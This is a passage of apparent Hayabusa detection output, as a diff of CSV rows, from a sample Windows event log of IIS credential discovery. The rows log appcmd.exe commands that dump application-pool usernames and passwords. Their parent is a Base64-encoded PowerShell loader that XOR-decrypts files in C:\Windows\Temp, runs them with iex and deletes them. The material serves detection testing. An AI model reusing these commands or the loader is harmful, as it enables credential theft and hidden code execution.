QgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool "". )"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool "". )"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
